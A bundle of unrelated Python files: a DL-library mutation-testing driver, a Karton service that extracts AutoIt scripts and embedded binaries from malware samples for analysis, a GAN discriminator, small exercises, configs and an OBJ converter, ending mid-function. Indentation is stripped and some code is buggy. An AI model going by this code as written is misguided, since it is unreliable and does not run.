os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = ""
"""Load Configuration"""
def check_has_NaN(predictions,bk_num):
"""
Check if there is NAN in the result
"""
def get_NaN_num(nds):
_nan_num = 0
for nd in nds:
if np.isnan(nd).any():
_nan_num += 1
return _nan_num
# Three Backends
if len(predictions) == bk_num:
for t in zip(*predictions):
nan_num = get_NaN_num(t)
if 0 < nan_num < bk_num:
return True
else:
continue
return False
else:
raise Exception("wrong backend amounts")
def get_mutate_time(seedname):
regex_str = seedname[:-3]
match = re.search(r"\d+$",regex_str)
return int(match.group())
def save_mutate_history(mcmc:MCMC,invalid_history:dict,mutant_history:list):
mutator_history_path = os.path.join(experiment_dir,"mutator_history.csv")
mutant_history_path = os.path.join(experiment_dir,"mutant_history.txt")
with open(mutator_history_path,"w+") as fw:
fw.write("Name,Success,Invalid,Total\n")
for op in invalid_history.keys():
mtrs = mcmc.mutators[op]
invalid_cnt = invalid_history[op]
fw.write("{},{},{},{}\n".format(op,mtrs.delta_bigger_than_zero,invalid_cnt,mtrs.total))
with open(mutant_history_path,"w+") as fw:
for mutant in mutant_history:
fw.write("{}\n".format(mutant))
def _generate_and_predict(res_dict,filename,mutate_num,mutate_ops,test_size,exp,backends):
"""
Generate models using mutate operators and store them
"""
mutate_op_history = { k:0 for k in mutate_ops}
mutate_op_invalid_history = {k: 0 for k in mutate_ops}
mutant_history = []
origin_model_name = "{}_origin0.h5".format(exp)
origin_save_path = os.path.join(mut_dir,origin_model_name)
shutil.copy(src=filename,dst=origin_save_path)
_,res_dict,inconsistency, _ = _get_model_prediction(res_dict,origin_save_path,origin_model_name,exp,test_size,backends)
mcmc = MCMC(mutate_ops)
roulette = Roulette([origin_model_name])
last_used_mutator = None
last_inconsistency = inconsistency
mutant_counter = 0
while mutant_counter < mutate_num:
picked_seed = utils.ToolUtils.select_mutant(roulette)
selected_op = utils.ToolUtils.select_mutator(mcmc, last_used_mutator=last_used_mutator)
mutate_op_history[selected_op] += 1
last_used_mutator = selected_op
mutator = mcmc.mutators[selected_op]
mutant = roulette.mutants[picked_seed]
# mutator.total += 1
mutant.selected += 1
new_seed_name = "{}-{}{}.h5".format(picked_seed[:-3],selected_op,mutate_op_history[selected_op])
if new_seed_name not in roulette.mutants.keys():
new_seed_path = os.path.join(mut_dir, new_seed_name)
picked_seed_path = os.path.join(mut_dir,picked_seed)
mutate_st = datetime.datetime.now()
mutate_status = os.system("{}/lemon/bin/python -m scripts.mutation.model_mutation_generators --model {} "
"--mutate_op {} --save_path {} --mutate_ratio {}".format(python_prefix,picked_seed_path, selected_op,
new_seed_path,flags.mutate_ratio))
mutate_et = datetime.datetime.now()
mutate_dt = mutate_et - mutate_st
h, m, s = utils.ToolUtils.get_HH_mm_ss(mutate_dt)
mutate_logger.info("INFO:Mutate Time Used on {} : {}h, {}m, {}s".format(selected_op, h, m, s))
if mutate_status == 0:
mutate_logger.info("INFO: Mutation progress {}/{}".format(mutant_counter+1,mutate_num))
predict_status,res_dict,inconsistency,model_outputs = _get_model_prediction(res_dict,new_seed_path,new_seed_name,exp,test_size,backends)
mutator.total += 1
if predict_status :
#mutant_counter += 1
mutant_history.append(new_seed_name)
if utils.ModelUtils.is_valid_model(model_outputs):
mutant_counter += 1
# The sum of the values of the inconsistency boost of the new model on the three backends
delta = 0
# for every backend
for key in inconsistency.keys():
# compare with last time
delta += inconsistency[key] - last_inconsistency[key]
# if sum of increments on three backends is greater than zero
# then add it into seed pool
if delta > 0:
mutator.delta_bigger_than_zero += 1
if roulette.pool_size >= pool_size:
roulette.pop_one_mutant()
roulette.add_mutant(new_seed_name)
else:
mutate_logger.warning("WARN: {} would not be put into pool".format(new_seed_name))
last_inconsistency = inconsistency
mutate_logger.info("SUCCESS:{} pass testing!".format(new_seed_name))
else:
mutate_op_invalid_history[selected_op] += 1
mutate_logger.error("ERROR: invalid model Found!")
else:
mutate_logger.error("ERROR:Crashed or NaN model Found!")
else:
mutate_logger.error("ERROR:Exception raised when mutate {} with {}".format(picked_seed,selected_op))
mutate_logger.info("Mutated op used history:")
mutate_logger.info(mutate_op_history)
mutate_logger.info("Invalid mutant generated history:")
mutate_logger.info(mutate_op_invalid_history)
save_mutate_history(mcmc,mutate_op_invalid_history,mutant_history)
return res_dict
def generate_metrics_result(res_dict,predict_output,model_idntfr):
mutate_logger.info("INFO: Generating Metrics Result")
inconsistency_score = {}
for pair in combinations(predict_output.items(), 2):
bk_prediction1, bk_prediction2 = pair[0], pair[1]
bk1, prediction1 = bk_prediction1[0], bk_prediction1[1]
bk2, prediction2 = bk_prediction2[0], bk_prediction2[1]
bk_pair = "{}_{}".format(bk1, bk2)
for metrics_name, metrics_result_dict in res_dict.items():
metrics_func = utils.MetricsUtils.get_metrics_by_name(metrics_name)
if metrics_name == 'D_MAD':
deltas = metrics_func(prediction1, prediction2, y_test[:flags.test_size])
inconsistency_score[bk_pair] = sum(deltas)
for i, delta in enumerate(deltas):
dk = "{}_{}_{}_input{}".format(model_idntfr, bk1, bk2, i)
metrics_result_dict[dk] = delta
mutate_logger.info(inconsistency_score)
return True, res_dict,inconsistency_score, predict_output
def _get_model_prediction(res_dict,model_path,model_name,exp,test_size,backends):
"""
Get model prediction on different backends and calculate distance by metrics
"""
predict_output = {b: [] for b in backends}
predict_status = set()
model_idntfr = model_name[:-3]
for bk in backends:
python_bin = f"{python_prefix}/{bk}/bin/python"
predict_st = datetime.datetime.now()
pre_status_bk = os.system(f"{python_bin} -u -m run.patch_prediction_extractor --backend {bk} "
f"--exp {exp} --test_size {test_size} --model {model_path} "
f"--redis_db {lemon_cfg['redis'].getint('redis_db')} --config_name {flags.config_name}")
predict_et = datetime.datetime.now()
predict_td = predict_et - predict_st
h, m, s = utils.ToolUtils.get_HH_mm_ss(predict_td)
mutate_logger.info("INFO:Prediction Time Used on {} : {}h, {}m, {}s".format(bk,h,m,s))
if pre_status_bk == 0: # If no exception is thrown,save prediction result
data = pickle.loads(redis_conn.hget("prediction_{}".format(model_name), bk))
predict_output[bk] = data
else: # record the crashed backend
mutate_logger.error("ERROR:{} crash on backend {} when predicting ".format(model_name,bk))
predict_status.add(pre_status_bk)
if 0 in predict_status and len(predict_status) == 1:
"""If all backends are working fine, check if there is NAN in the result"""
predictions = list(predict_output.values())
has_NaN = check_has_NaN(predictions,len(backends))
if has_NaN:
nan_model_path = os.path.join(nan_dir, model_name)
mutate_logger.error("Error: move NAN model")
shutil.move(model_path, nan_model_path)
return False, res_dict,None, None
else:
mutate_logger.info("INFO: Saving prediction")
with open("{}/prediction_{}.pkl".format(inner_output_dir, model_idntfr), "wb+") as f:
pickle.dump(predict_output, file=f)
with open("{}/patch_prediction_{}.pkl".format(inner_output_dir, model_idntfr), "wb+") as f:
pickle.dump(predict_output, file=f)
return generate_metrics_result(res_dict=res_dict,predict_output=predict_output,model_idntfr=model_idntfr)
else: # record the crashed model
mutate_logger.error("Error: move crash model")
crash_model_path = os.path.join(crash_dir, model_name)
shutil.move(model_path, crash_model_path)
return False, res_dict,None, None
if __name__ == "__main__":
starttime = datetime.datetime.now()
"""Parser of command args"""
parse = argparse.ArgumentParser()
parse.add_argument("--is_mutate", type=ast.literal_eval, default=False,
help="parameter to determine mutation option")
parse.add_argument("--mutate_op", type=str, nargs='+',
choices=['WS', 'GF', 'NEB', 'NAI', 'NS', 'ARem', 'ARep', 'LA', 'LC', 'LR', 'LS','MLA']
, help="parameter to determine mutation option")
parse.add_argument("--model", type=str, help="relative path of model file(from root dir)")
parse.add_argument("--output_dir", type=str, help="relative path of output dir(from root dir)")
parse.add_argument("--backends", type=str, nargs='+', help="list of backends")
parse.add_argument("--mutate_num", type=int, help="number of variant models generated by each mutation operator")
parse.add_argument("--mutate_ratio", type=float, help="ratio of mutation")
parse.add_argument("--exp", type=str, help="experiments identifiers")
parse.add_argument("--test_size", type=int, help="amount of testing image")
parse.add_argument("--config_name", type=str, help="config name")
flags, unparsed = parse.parse_known_args(sys.argv[1:])
warnings.filterwarnings("ignore")
lemon_cfg = configparser.ConfigParser()
lemon_cfg.read(f"./config/{flags.config_name}")
mutate_logger = Logger()
pool = redis.ConnectionPool(host=lemon_cfg['redis']['host'], port=lemon_cfg['redis']['port'],db=lemon_cfg['redis'].getint('redis_db'))
redis_conn = redis.Redis(connection_pool=pool)
for k in redis_conn.keys():
if flags.exp in k.decode("utf-8"):
redis_conn.delete(k)
experiment_dir = os.path.join(flags.output_dir,flags.exp) # exp : like lenet5-mnist
mut_dir = os.path.join(experiment_dir, "mut_model")
crash_dir = os.path.join(experiment_dir, "crash")
nan_dir = os.path.join(experiment_dir, "nan")
inner_output_dir = os.path.join(experiment_dir,"inner_output")
metrics_result_dir = os.path.join(experiment_dir,"metrics_result")
x, y = utils.DataUtils.get_data_by_exp(flags.exp)
x_test, y_test = x[:flags.test_size], y[:flags.test_size]
pool_size = lemon_cfg['parameters'].getint('pool_size')
python_prefix = lemon_cfg['parameters']['python_prefix'].rstrip("/")
try:
metrics_list = lemon_cfg['parameters']['metrics'].split(" ")
lemon_results = {k: dict() for k in metrics_list}
lemon_results = _generate_and_predict(lemon_results,flags.model,flags.mutate_num,flags.mutate_op,
flags.test_size,flags.exp,flags.backends)
with open("{}/{}_lemon_results.pkl".format(experiment_dir,flags.exp),"wb+") as f:
pickle.dump(lemon_results, file=f)
utils.MetricsUtils.generate_result_by_metrics(metrics_list,lemon_results,metrics_result_dir,flags.exp)
except Exception as e:
mutate_logger.exception(sys.exc_info())
from keras import backend as K
K.clear_session()
endtime = datetime.datetime.now()
time_delta = endtime - starttime
h,m,s = utils.ToolUtils.get_HH_mm_ss(time_delta)
mutate_logger.info("INFO:Mutation process is done: Time used: {} hour,{} min,{} sec".format(h,m,s))
|
class gamer():
def __init__(self):
self.position=(80,80)
self.face = 'S'
self.stone_getable= []
self.stone_ungetable=[]
self.stones=[]
self.have_stones=0
self.graph=None
self.tree =[]
self.tree_ungetable =[]
self.tree_getable =[]
self.key =[]
self.axe=[]
self.door=[]
self.have_raft = False
self.treasure=None
self.have_treasure=False
self.have_key = False
self.have_axe = False
def total_stone(self):
return self.stone_count+len(self.stone)
# def have_key(self):
# return len(self.key)>0
# def have_aex(self):
# return len(self.aex)>0
def total_tree(self):
return len(self.tree)
def get_node(self):
return self.graph[self.position[0]][self.position[1]]
|
# Pratice 41. Parsing a Data File
# Input:
# File name : parsing_a_data_file_input
# Output:
# Last First Salary
# ------------------------
# Ling Mai 55900
# Johnson Jim 56500
# Jones Aaron 46000
# Jones Chris 34500
# Swift Geoffrey 14200
# Xiong Fong 65000
# Zarnecki Sabrina 51500
# Constraint:
# - Write your own code to parse the data.
# Don'y use a CSV parser.
# - Use spaces to align the columns.
# - Make each column one space longer than the longest value in the column.
#!/usr/bin/env python
import sys
FILE_NAME = 'parsing_a_data_file_input'
LAST_NAME_IDX = 0
FIRST_NAME_IDX = 1
SALARY_IDX = 2
def read_file():
data_list = []
try:
with open(FILE_NAME, 'r') as f:
for line in f.readlines():
data_list.append(line.strip().split(','))
except:
print ('File does not exist.')
exit()
return data_list
def get_data_length(in_data_list):
last_name_len = 0
first_name_len = 0
salary_len = 0
for data in in_data_list:
last_name_len = last_name_len if last_name_len > len(data[LAST_NAME_IDX]) else len(data[LAST_NAME_IDX])
first_name_len = first_name_len if first_name_len > len(data[FIRST_NAME_IDX]) else len(data[FIRST_NAME_IDX])
salary_len = salary_len if salary_len > len(data[SALARY_IDX]) else len(data[SALARY_IDX])
return (last_name_len + 1, first_name_len + 1, salary_len + 1)
def print_names(in_data_list):
(last_name_len, first_name_len, salary_len) = get_data_length(in_data_list)
print('{:' '<{}}{:' '<{}}{:' '<{}}'.format('Last', last_name_len, 'First', first_name_len, 'Salary', salary_len))
print ('-------------------------')
for data in in_data_list:
print('{:' '<{}}{:' '<{}}{:' '<{}}'.format(data[LAST_NAME_IDX], last_name_len, \
data[FIRST_NAME_IDX], first_name_len, data[SALARY_IDX], salary_len))
if __name__ == '__main__':
data_list = read_file()
print_names(data_list)
|
from pathlib import Path
from autoit_ripper import AutoItVersion, extract # type: ignore
from karton.core import Karton, Resource, Task
from malduck.yara import Yara # type: ignore
from .__version__ import __version__
from .extract_drop import extract_binary
class AutoItRipperKarton(Karton):
"""
Extracts embedded AutoIt scripts from binaries and additionaly
tries to extract some binary drops from scripts
"""
identity = "karton.autoit-ripper"
version = __version__
persistent = True
filters = [
{
"type": "sample",
"stage": "recognized",
"kind": "runnable",
"platform": "win32",
},
{
"type": "sample",
"stage": "recognized",
"kind": "runnable",
"platform": "win64",
},
]
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
yara_path = Path(__file__).parent / "autoit.yar"
self.yara = Yara(rule_paths={"autoit": yara_path.as_posix()})
def process(self, task: Task) -> None: # type: ignore
sample = task.get_resource("sample")
resources = None
m = self.yara.match(data=sample.content)
if "autoit_v3_00" in m:
self.log.info("Found a possible autoit v3.00 binary")
resources = extract(data=sample.content, version=AutoItVersion.EA05)
elif "autoit_v3_26" in m:
self.log.info("Found a possible autoit v3.26+ binary")
resources = extract(data=sample.content, version=AutoItVersion.EA06)
if resources:
self.log.info("Found embedded data, reporting!")
for res_name, res_data in resources:
if res_name.endswith(".dll") or res_name.endswith(".exe"):
task_params = {
"type": "sample",
"kind": "raw",
}
elif res_name == "script.au3":
task_params = {
"type": "sample",
"kind": "script",
"stage": "analyzed",
"extension": "au3",
}
else:
continue
self.log.info("Sending a task with %s", res_name)
script = Resource(res_name, res_data)
self.send_task(
Task(
task_params,
payload={
"sample": script,
"parent": sample,
"tags": ["script:win32:au3"],
},
)
)
if res_name == "script.au3":
self.log.info("Looking for a binary embedded in the script")
drop = extract_binary(res_data.decode())
if drop:
self.log.info("Found an embedded binary")
self.send_task(
Task(
{"type": "sample", "kind": "raw"},
payload={
"sample": Resource(
name="autoit_drop.exe", content=drop
),
"parent": script,
},
)
)
|
"""
Provide constants for hostdb endpoint.
"""
ALL_URL = '/hostdb/all'
ACTIVE_URL = '/hostdb/active'
HOSTS_URL = '/hostdb/hosts/'
|
import math
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.nn.utils.spectral_norm as SpectralNorm
def get_norm(norm_type, size):
if(norm_type == 'batchnorm'):
return nn.BatchNorm2d(size)
elif(norm_type == 'instancenorm'):
return nn.InstanceNorm2d(size)
class Nothing(nn.Module):
def __init__(self):
super(Nothing, self).__init__()
def forward(self, x):
return x
class ConvBlock(nn.Module):
def __init__(self, ni, no, ks, stride, pad = None, pad_type = 'Zero', use_bn = True, use_sn = False, use_pixelshuffle = False, norm_type = 'batchnorm', activation_type = 'leakyrelu'):
super(ConvBlock, self).__init__()
self.use_bn = use_bn
self.use_sn = use_sn
self.use_pixelshuffle = use_pixelshuffle
self.norm_type = norm_type
self.pad_type = pad_type
if(pad == None):
pad = ks // 2 // stride
if(use_pixelshuffle):
if(self.pad_type == 'Zero'):
self.conv = nn.Conv2d(ni, no * 4, ks, stride, pad, bias = False)
elif(self.pad_type == 'Reflection'):
self.conv = nn.Conv2d(ni, no * 4, ks, stride, 0, bias = False)
self.reflection = nn.ReflectionPad2d(pad)
self.pixelshuffle = nn.PixelShuffle(2)
else:
if(self.pad_type == 'Zero'):
self.conv = nn.Conv2d(ni, no, ks, stride, pad, bias = False)
elif(self.pad_type == 'Reflection'):
self.conv = nn.Conv2d(ni, no, ks, stride, 0, bias = False)
self.reflection = nn.ReflectionPad2d(pad)
if(self.use_bn == True):
if(self.norm_type == 'batchnorm'):
self.bn = nn.BatchNorm2d(no)
elif(self.norm_type == 'instancenorm'):
self.bn = nn.InstanceNorm2d(no)
if(self.use_sn == True):
self.conv = SpectralNorm(self.conv)
if(activation_type == 'relu'):
self.act = nn.ReLU(inplace = True)
elif(activation_type == 'leakyrelu'):
self.act = nn.LeakyReLU(0.2, inplace = True)
elif(activation_type == 'elu'):
self.act = nn.ELU(inplace = True)
elif(activation_type == 'selu'):
self.act = nn.SELU(inplace = True)
elif(activation_type == None):
self.act = Nothing()
def forward(self, x):
out = x
if(self.pad_type == 'Reflection'):
out = self.reflection(out)
out = self.conv(out)
if(self.use_pixelshuffle == True):
out = self.pixelshuffle(out)
if(self.use_bn == True):
out = self.bn(out)
out = self.act(out)
return out
class DeConvBlock(nn.Module):
def __init__(self, ni, no, ks, stride, pad = None, output_pad = 0, use_bn = True, use_sn = False, norm_type = 'batchnorm', activation_type = 'leakyrelu'):
super(DeConvBlock, self).__init__()
self.use_bn = use_bn
self.use_sn = use_sn
self.norm_type = norm_type
if(pad is None):
pad = ks // 2 // stride
self.deconv = nn.ConvTranspose2d(ni, no, ks, stride, pad, output_padding = output_pad, bias = False)
if(self.use_bn == True):
if(self.norm_type == 'batchnorm'):
self.bn = nn.BatchNorm2d(no)
elif(self.norm_type == 'instancenorm'):
self.bn = nn.InstanceNorm2d(no)
if(self.use_sn == True):
self.deconv = SpectralNorm(self.deconv)
if(activation_type == 'relu'):
self.act = nn.ReLU(inplace = True)
elif(activation_type == 'leakyrelu'):
self.act = nn.LeakyReLU(0.2, inplace = True)
elif(activation_type == 'elu'):
self.act = nn.ELU(inplace = True)
elif(activation_type == 'selu'):
self.act = nn.SELU(inplace = True)
elif(activation_type == None):
self.act = Nothing()
def forward(self, x):
out = self.deconv(x)
if(self.use_bn == True):
out = self.bn(out)
out = self.act(out)
return out
class PatchGan_D_70x70_One_Input(nn.Module):
def __init__(self, ic, use_sigmoid = True, norm_type = 'instancenorm', use_sn = False):
super(PatchGan_D_70x70_One_Input, self).__init__()
self.ic = ic
self.use_sn = use_sn
self.use_sigmoid = use_sigmoid
self.conv1 = ConvBlock(self.ic, 64, 4, 2, 1, use_bn = False, activation_type = 'leakyrelu', use_sn = self.use_sn)
self.conv2 = ConvBlock(64, 128, 4, 2, 1, use_bn = True, norm_type = norm_type, activation_type = 'leakyrelu', use_sn = self.use_sn)
self.conv3 = ConvBlock(128, 256, 4, 2, 1, use_bn = True, norm_type = norm_type, activation_type = 'leakyrelu', use_sn = self.use_sn)
self.conv4 = ConvBlock(256, 512, 4, 1, 1, use_bn = True, norm_type = norm_type, activation_type = 'leakyrelu', use_sn = self.use_sn)
self.conv5 = ConvBlock(512, 1, 4, 1, 1, use_bn = False, activation_type = None, use_sn = self.use_sn)
self.sigmoid = nn.Sigmoid()
self.nothing = Nothing()
for m in self.modules():
if(isinstance(m, nn.Conv2d)):
m.weight.data.normal_(0.0, 0.02)
if(m.bias is not None):
m.bias.data.zero_()
def forward(self, x):
out = x
# (bs, ic, 256, 256)
out1 = self.conv1(out)
# (bs, 64, 128, 128)
out2 = self.conv2(out1)
# (bs, 128, 64, 64)
out3 = self.conv3(out2)
# (bs, 256, 32, 32)
out4 = self.conv4(out3)
# (bs, 512, 31, 31)
out5 = self.conv5(out4)
# (bs, 1, 30, 30)
if(self.use_sigmoid == True):
out = self.sigmoid(out5)
else:
out = self.nothing(out5)
return out
class PatchGan_D_286x286_One_Input(nn.Module):
def __init__(self, ic, use_sigmoid = True, norm_type = 'instancenorm', use_sn = False):
super(PatchGan_D_286x286_One_Input, self).__init__()
self.ic = ic
self.use_sn = use_sn
self.use_sigmoid = use_sigmoid
self.conv1 = ConvBlock(self.ic, 64, 4, 2, 1, use_bn = False, activation_type = 'leakyrelu', use_sn = self.use_sn)
self.conv2 = ConvBlock(64, 128, 4, 2, 1, use_bn = True, norm_type = norm_type, activation_type = 'leakyrelu', use_sn = self.use_sn)
self.conv3 = ConvBlock(128, 256, 4, 2, 1, use_bn = True, norm_type = norm_type, activation_type = 'leakyrelu', use_sn = self.use_sn)
self.conv4 = ConvBlock(256, 512, 4, 2, 1, use_bn = True, norm_type = norm_type, activation_type = 'leakyrelu', use_sn = self.use_sn)
self.conv5 = ConvBlock(512, 512, 4, 2, 1, use_bn = True, norm_type = norm_type, activation_type = 'leakyrelu', use_sn = self.use_sn)
self.conv6 = ConvBlock(512, 512, 4, 1, 1, use_bn = True, norm_type = norm_type, activation_type = 'leakyrelu', use_sn = self.use_sn)
self.conv7 = ConvBlock(512, 1, 4, 1, 1, use_bn = False, activation_type = None, use_sn = self.use_sn)
self.sigmoid = nn.Sigmoid()
self.nothing = Nothing()
for m in self.modules():
if(isinstance(m, nn.Conv2d)):
m.weight.data.normal_(0.0, 0.02)
if(m.bias is not None):
m.bias.data.zero_()
def forward(self, x):
out = x
# (bs, ic, 256, 256)
out1 = self.conv1(out)
# (bs, 64, 128, 128)
out2 = self.conv2(out1)
# (bs, 128, 64, 64)
out3 = self.conv3(out2)
# (bs, 256, 32, 32)
out4 = self.conv4(out3)
# (bs, 256, 16, 16)
out5 = self.conv5(out4)
# (bs, 256, 8, 8)
out6 = self.conv6(out5)
# (bs, 512, 7, 7)
out7 = self.conv7(out6)
# (bs, 1, 6, 6)
if(self.use_sigmoid == True):
out = self.sigmoid(out7)
else:
out = self.nothing(out7)
return out
|
TITLE = "chip-8"
ZOOM = 10
SCREEN_WIDTH = 64
SCREEN_HEIGHT = 32
CLOCK_SPEED = 1200
TIMER_SPEED = 60
BG_COLOR = (0xa0, 0xe6, 0xfa)
FG_COLOR = (0xff, 0xff, 0xff)
|
#!/usr/bin/python3
import sys
n = int(input().strip())
a = list(map(int, input().strip().split(' ')))
def bubble(arr):
count_swap = 0
for num in range(len(arr) - 1, 0, -1):
for i in range(num):
if arr[i] > arr[i + 1]:
arr[i], arr[i + 1] = arr[i + 1], arr[i]
count_swap += 1
return count_swap
if __name__ == "__main__":
print("Array is sorted in {} swaps.".format(bubble(a)))
print("First Element: {}".format(a[0]))
print("Last Element: {}".format(a[-1]))
|
# coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from midgard.server.models.base_model_ import Model
from midgard.server import util
class GPUMaxClockInfo(Model):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, sm_clock: float=None, unit: str=None): # noqa: E501
"""GPUMaxClockInfo - a model defined in Swagger
:param sm_clock: The sm_clock of this GPUMaxClockInfo. # noqa: E501
:type sm_clock: float
:param unit: The unit of this GPUMaxClockInfo. # noqa: E501
:type unit: str
"""
self.swagger_types = {
'sm_clock': float,
'unit': str
}
self.attribute_map = {
'sm_clock': 'smClock',
'unit': 'unit'
}
self._sm_clock = sm_clock
self._unit = unit
@classmethod
def from_dict(cls, dikt) -> 'GPUMaxClockInfo':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The GPUMaxClockInfo of this GPUMaxClockInfo. # noqa: E501
:rtype: GPUMaxClockInfo
"""
return util.deserialize_model(dikt, cls)
@property
def sm_clock(self) -> float:
"""Gets the sm_clock of this GPUMaxClockInfo.
:return: The sm_clock of this GPUMaxClockInfo.
:rtype: float
"""
return self._sm_clock
@sm_clock.setter
def sm_clock(self, sm_clock: float):
"""Sets the sm_clock of this GPUMaxClockInfo.
:param sm_clock: The sm_clock of this GPUMaxClockInfo.
:type sm_clock: float
"""
self._sm_clock = sm_clock
@property
def unit(self) -> str:
"""Gets the unit of this GPUMaxClockInfo.
:return: The unit of this GPUMaxClockInfo.
:rtype: str
"""
return self._unit
@unit.setter
def unit(self, unit: str):
"""Sets the unit of this GPUMaxClockInfo.
:param unit: The unit of this GPUMaxClockInfo.
:type unit: str
"""
self._unit = unit
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
DESCRIPTION="""
Converts an OBJ file to the internal model file.
Examples:
1. python3 models.py Warehouse.obj Warehouse.model
2. python3 models.py Warehouse.obj Warehouse.obj --replace-ext
"""
EPILOG = """
Debugging
---------
For the debugging, please, run the script in Spyder twice:
1. First time it will fail.
2. The second time it will run with the default arguments and save the state
between runs, so you'll be able to debug it with comfort.
Created on Sat Jan 26 18:28:01 2019
@author: egslava
"""
######### DEBUG/ARGPARSE ###########
if "N_DEBUG_RUNS" in globals():
if (N_DEBUG_RUNS == 1):
print("Please, don't forget to 'restart_debugging()' if you want to chage the debugging file");
# in_filename = "Cube.obj"
# in_filename = "Plane.obj"
# in_filename = "Warehouse-Triangulated.obj"
in_filename = "Warehouse.obj"
out_filename = "/home/egslava/my/arena-shooter/client/res/warehouse.model"
verbose = False
else:
N_DEBUG_RUNS = 1
import argparse
parser = argparse.ArgumentParser(description=DESCRIPTION,
epilog=EPILOG,
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('input', help='input .obj file')
parser.add_argument('output', help='output .model file to create')
parser.add_argument('--replace-ext',
action='store_true',
help='In case if the output file has an extension '
'it will be replaced to ".model automatically')
parser.add_argument('--silent',
action='store_true',
help="Don't print any non-error output")
args = parser.parse_args()
in_filename = args.input
out_filename = args.output
verbose = not args.silent;
if (args.replace_ext):
import os
out_filename = os.path.splitext(out_filename)[0] + ".model"
# 1. Is it
if "data" not in globals():
with open(in_filename, "r") as obj_file:
data = obj_file.read()
##############################################################
########################## CONVERTING ########################
##############################################################
# Here we already have
# - `data` variable with the content of input obj
# - `out_filename` variable with the exact output filename
hash_count = 0
empty_count = 0
v_count = 0
vt_count = 0
vn_count = 0
n_count = 0
f_count = 0
unsupported_count = 0
unknown_count = 0
v_indexes = set()
vt_indexes = set()
vn_indexes = set()
__indexes = set()
positions = []
tex_coords= []
normals = []
unidx_positions = []
unidx_tex_coords = []
unidx_normals = []
unidx_faces = [] # [ [ [1/nil/6], [4//6], [8//6] ], ...]
# face = [
# [[pos, tex, normal], [pos, tex, normal], [pos, tex, normal]]
#]
for line in data.split("\n"):
if line.startswith("#"):
hash_count += 1
elif line.startswith("vt "):
u, v = line[3:].split(" ")
u = float(u)
v = float(v)
tex_coords.append([u, v])
vt_count += 1
elif line.startswith("vn "):
x, y, z = line[3:].split(" ")
x = float(x)
y = float(y)
z = float(z)
# print(x, y, z)
normals.append([x, y, z])
vn_count += 1
elif line.startswith("v "):
x, y, z = line[2:].split(" ")
x = float(x)
y = float(y)
z = float(z)
# print(x, y, z)
positions.append([x, y, z])
v_count += 1
elif line.startswith("f "):
f_count += 1
face = []
verts = line[2:].split(" ")
for vert in verts:
i_v, i_vt, i_vn = vert.split("/")
i_v = int(i_v) - 1
# assert i_v == 0, "i_v == 0"
if (i_vt not in (None, "")):
i_vt = int(i_vt) - 1
else:
i_vt = None
if (i_vn not in (None, "")):
i_vn = int(i_vn) - 1
else:
i_vn = None
# print(i_vt, i_vn)
assert ((i_vt or i_vn) >= 0)
if (i_v < 0):
raise Exception("Negative indexes are not supported: %d (v)" % i_v)
if (i_vt is not None and i_vt < 0):
raise Exception("Negative indexes are not supported: %d (vt)"% i_vt)
if (i_vn is not None and i_vn < 0):
raise Exception("Negative indexes are not supported: %d (vn)"% i_vn)
v_indexes.add(i_v)
vt_indexes.add(i_vt)
vn_indexes.add(i_vn)
# print("i_v", i_v)
# print("positions: ", positions)
v = positions[i_v]
vt = tex_coords[i_vt] if i_vt is not None else None
vn = normals[i_vn] if i_vn is not None else None
# print(i_vt, i_vn, vt, vn)
assert vt or vn
face.append([v, vt, vn])
assert( len(face) == 3) # currently, only triangles are supported
unidx_faces.append(face)
# __indexes.add(_)
# print(line)
elif not line.strip():
empty_count += 1
# print("Empty line: ", line)
# materials are hardcoded
# smoothing groups
# object groups
elif (line.startswith("mtllib ") or
line.startswith("usemtl ") or
line.startswith("s ") or
line.startswith("o ")):
unsupported_count += 1
else:
unknown_count += 1
# print("Special line: ", line)
def print_debug_info():
print("#: %4d | v: %4d | vt: %3d | vn: %3d | f: %4d | e: %4d" % (
hash_count, v_count, vt_count, vn_count, f_count, empty_count))
print("%3d v_indices" % len(v_indexes))
print("%3d vt_indices" % len(vt_indexes))
print("%3d vn_indices" % len(vn_indexes))
print("%3d __indices" % len(__indexes))
print("Unsupported lines found: %3d" % unsupported_count)
print("Unknown lines found: %3d" % unknown_count)
# print(line)
assert (len(v_indexes) == v_count)
assert (len(vt_indexes.difference({None})) == vt_count)
assert (len(vn_indexes.difference({None})) == vn_count)
VBO_positions = []
VBO_tex_coords = []
VBO_normals = []
for face in unidx_faces:
for vertex in face:
pos, tex, normal = vertex
VBO_positions.append(pos)
VBO_tex_coords.append(tex)
VBO_normals.append(normal)
assert (len(VBO_positions) == len(VBO_tex_coords) == len(VBO_normals))
FLAGS = 0
HAS_POS = 1 << 0
HAS_TEX_COORDS = 1 << 1
HAS_NORMALS = 1 << 2
if None not in VBO_positions:
FLAGS |= HAS_POS
if None not in VBO_tex_coords:
FLAGS |= HAS_TEX_COORDS
if None not in VBO_normals:
FLAGS |= HAS_NORMALS
import struct
with open(out_filename, 'wb') as fout:
n_triangles = len(VBO_positions) // 3
fout.write( struct.pack("I", FLAGS)) # unsigned int - triangle count
fout.write( struct.pack("I", n_triangles)) # unsigned int - triangle count
if FLAGS & HAS_POS:
for position in VBO_positions:
fout.write( struct.pack("fff", *position))
if FLAGS & HAS_TEX_COORDS:
for tex_coords in VBO_tex_coords:
fout.write( struct.pack("ff", *tex_coords))
if FLAGS & HAS_NORMALS:
for normal in VBO_normals:
fout.write( struct.pack("fff", *normal))
if verbose:
print("Transformed {input} to {output}".format(input=in_filename, output=out_filename))
#Here we go. Now we have unidx_faces and we just need to export it! :)
# Yai!
def restart_debugging():
global data
global N_DEBUG_RUNS
del data
del N_DEBUG_RUNS
print("Restarted!")
N_DEBUG_RUNS += 1
|
# -*- coding: utf-8 -*-
import os
import sys
import time
import datetime
import shutil
import random
import string
import re
import json
import socket
"""
Time Helper
"""
def today(form='%Y-%m-%d'):
return datetime.datetime.now().strftime(form)
def days_ago(days=0, form='%Y-%m-%d'):
return (datetime.datetime.now() - datetime.timedelta(days=days)).strftime(form)
def days_later(days=0, form='%Y-%m-%d'):
